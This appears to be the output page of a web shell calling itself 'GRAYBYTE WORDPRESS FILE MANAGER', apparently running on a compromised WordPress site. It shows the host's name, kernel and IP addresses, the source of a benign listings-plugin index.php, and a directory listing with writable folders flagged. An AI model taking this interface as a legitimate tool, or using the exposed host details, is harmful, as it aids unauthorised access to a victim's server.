✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.6
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/tdhomesa/public_html/wp-content/plugins/SW_Win_Classified//index.php
<?php

/*
Plugin Name: wListings - Listings Directory Plugin for WordPress
Plugin URI: http://www.directory-listings.com
Description: Listings Directory and Management plugin with customizable fields and many inovative features
Author: SWIT
Author URI: http://www.directory-listings.com
Version: 3.1
Text Domain: sw_win
Domain Path: /locale/
*/

if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly

// Disable free if premium plugin installed
if(plugin_basename(__FILE__) != 'SW_Win_Classified/index.php')
{
    if(file_exists(plugin_dir_path( __FILE__ ).'../SW_Win_Classified/'))
    {
        return;
    }
}

define( 'SW_WIN_PLUGIN_PATH', plugin_dir_path( __FILE__ ) );
define( 'SW_WIN_PLUGIN_NAME', plugin_basename(__FILE__) );
define( 'SW_WIN_FILENAME', basename(__FILE__, '.php') );
define( 'SW_WIN_SLUG', dirname(plugin_basename(__FILE__)) );

$dir_widgets = dirname(__FILE__)."/widgets/";
$dir_shortcodes = dirname(__FILE__)."/shortcodes/";
$dir_vc = dirname(__FILE__)."/vc/";
$dir_include = dirname(__FILE__)."/include/";

include dirname(__FILE__).'/config.php';
if($config['app_type'] == 'demo')
    include dirname(__FILE__).'/demo_mode.php';


if($config['app_disable_login'] == TRUE)
{
    if(substr_count($_SERVER['REQUEST_URI'], 'wp-register.php') ||
       substr_count($_SERVER['REQUEST_URI'], 'wp-admin.php') ||
       substr_count($_SERVER['REQUEST_URI'], 'wp-login.php')) {
       die('Access temporarly disabled in demo.');
       exit;
    }
    
    if(substr_count($_SERVER['REQUEST_URI'], 'admin-ajax.php') == 0) {
        add_action('admin_init', 'sw_win_disable_dash', 1);
    }
    
}

function sw_win_disable_dash() {
    echo "<span style=\"color:red;border:1px solid red;padding:5px;\">Dashboard temporarily disabled in demo.</span>";
    exit;
}


include dirname(__FILE__).'/sw_win_helpers.php';
include dirname(__FILE__).'/sw_win_options.php';
include dirname(__FILE__).'/sw_win_filters.php';
include dirname(__FILE__).'/sw_win_dashwidget.php';

sw_var_checker();

if(sw_classified_installed()){
  // Load all widget files
  if (is_dir($dir_widgets)){
    if ($dh = opendir($dir_widgets)){
      while (($file = readdir($dh)) !== false){
          if(strrpos($file, ".php") !== FALSE)
              include_once($dir_widgets.$file);
      }
      closedir($dh);
    }
  }

  // Load all shortcode files
  if (is_dir($dir_shortcodes)){
    if ($dh = opendir($dir_shortcodes)){
      while (($file = readdir($dh)) !== false){
          if(strrpos($file, ".php") !== FALSE)
              include_once($dir_shortcodes.$file);
      }
      closedir($dh);
    }
  }
}
// Load all vc (visual composer) files
if (is_dir($dir_vc)){
  if ($dh = opendir($dir_vc)){
    while (($file = readdir($dh)) !== false){
        if(strrpos($file, ".php") !== FALSE)
            include_once($dir_vc.$file);
    }
    closedir($dh);
  }
}

// Load all include files
if (is_dir($dir_include)){
    if ($dh = opendir($dir_include)){
      while (($file = readdir($dh)) !== false){
          if(strrpos($file, ".php") !== FALSE)
              include_once($dir_include.$file);
      }
      closedir($dh);
    }
}

if(file_exists(WP_PLUGIN_DIR.'/dirmaker-pro/include/'))
{
    $dir_include = WP_PLUGIN_DIR.'/dirmaker-pro/include/';

    if (is_dir($dir_include)){
        if ($dh = opendir($dir_include)){
          while (($file = readdir($dh)) !== false){
              if(strrpos($file, ".php") !== FALSE)
                  include_once($dir_include.$file);
          }
          closedir($dh);
        }
    }
}

  include dirname(__FILE__).'/index_actions.php';

?>


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
22 Jun 2026 6.38 AM
tdhomesa / tdhomesa
0755
assets
--
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0755
codeigniter
--
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0755
demo_listings
--
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0755
files
--
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0755
images
--
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0755
include
--
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0755
licensing
--
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0755
locale
--
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0755
shortcodes
--
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0755
sql_scripts
--
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0755
vc
--
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0755
widgets
--
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0755
.htaccess
0.124 KB
22 Jun 2026 6.39 AM
tdhomesa / tdhomesa
0444
config.php
0.833 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
demo_mode.php
11.618 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
index.php
3.636 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
index_actions.php
47.57 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
info.php
0.208 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
readme.txt
5.075 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
strict_image.php
57.325 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
sw_win_dashwidget.php
14.141 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
sw_win_filters.php
32.671 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
sw_win_helpers.php
65.725 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
sw_win_options.php
26.291 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
translate_generator.php
2.124 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
world-cities.csv
635.427 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644
world-cities_bac.csv
874.565 KB
30 Apr 2025 12.46 PM
tdhomesa / tdhomesa
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF